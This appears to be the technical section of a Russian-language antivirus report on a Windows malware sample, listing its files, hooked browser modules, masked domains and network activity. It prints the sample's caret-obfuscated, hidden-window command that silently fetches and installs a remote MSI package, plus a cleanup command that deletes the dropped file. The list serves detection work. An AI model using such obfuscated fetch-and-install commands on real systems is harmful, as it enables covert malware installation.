Техническая информация
- '<SYSTEM32>\cmd.exe' /C m^SiE^x^e^c /i http://fa###finn.com/admin/tfv88791.msi /qn
- %WINDIR%\explorer.exe
- iexplore.exe
- Процесс firefox.exe, модуль nss3.dll
- Процесс iexplore.exe, модуль wininet.dll
- %BOOT_VOL%\boot\bcd.log
- %BOOT_VOL%\boot\bcd
- %TEMP%\ic05oh9zkt8zqz0pdz3
- %TEMP%\tszfiuvjjy0fuui815a
- %TEMP%\nsd2ed.tmp\0djwv1e4o91gu5.dll
- %WINDIR%\installer\msi14a.tmp
- %LOCALAPPDATA%\microsoft\windows\usrclass.dat.log1
- %LOCALAPPDATA%\microsoft\windows\usrclass.dat
- 'fa###finn.com':80
- 'wh####gsflyhigh.com':80
- 'ar###tech.com':80
- 'me#######oartisanalfoods.com':80
- DNS ASK fa###finn.com
- DNS ASK fb####sbvsjbvjs.com
- DNS ASK wh####gsflyhigh.com
- DNS ASK ar###tech.com
- DNS ASK me#######oartisanalfoods.com
- '%WINDIR%\installer\msi14a.tmp'
- '<SYSTEM32>\cmd.exe' /C m^SiE^x^e^c /i http://fa###finn.com/admin/tfv88791.msi /qn' (со скрытым окном)
- '<SYSTEM32>\msiexec.exe' /i http://fa###finn.com/admin/tfv88791.msi /qn
- '%WINDIR%\syswow64\netstat.exe'
- '%WINDIR%\syswow64\cmd.exe' del "%WINDIR%\Installer\MSI14A.tmp"